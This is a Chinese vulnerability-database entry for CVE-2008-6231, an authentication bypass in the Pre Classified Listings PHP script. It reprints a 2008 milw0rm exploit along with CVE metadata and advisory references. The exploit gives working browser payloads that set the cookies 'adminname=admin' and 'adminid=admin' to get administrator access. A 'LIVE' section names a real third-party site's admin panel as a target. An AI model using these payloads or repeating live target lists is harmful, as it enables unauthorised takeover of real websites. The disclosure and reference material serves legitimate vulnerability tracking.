Pre Projects Pre Classified Listing PHP 绕过身份鉴别和授权漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116646 漏洞类型 信任管理
发布时间 2008-11-05 更新时间 2009-03-13
CVE编号 CVE-2008-6231 CNNVD-ID CNNVD-200902-463
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7000
https://cxsecurity.com/issue/WLB-2009020241
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-463
|漏洞详情
PreClassifiedListing是基于PHP和Mysql开发的多样化的分类广告脚本,有完全定制的、功能齐全的广告分类清单。PreClassifiedListingPHP允许远程攻击者通过设置(1)管理名和(2)对"admin"的adminidcookies,绕过权限并获得管理访问权。
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre Classified Listings PHP Insecure Cookie Handling
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre Classified Listings PHP version
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/pclphp.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ LIVE ]===
Admin Panel: http://www.hostnomi.net/classi/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";





===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]
|参考资料

来源:XF
名称:preclassifiedlistings-cookie-sec-bypass(46390)
链接:http://xforce.iss.net/xforce/xfdb/46390
来源:BID
名称:32126
链接:http://www.securityfocus.com/bid/32126
来源:MILW0RM
名称:7000
链接:http://www.milw0rm.com/exploits/7000
来源:VUPEN
名称:ADV-2008-3019
链接:http://www.frsirt.com/english/advisories/2008/3019
来源:SECUNIA
名称:32557
链接:http://secunia.com/advisories/32557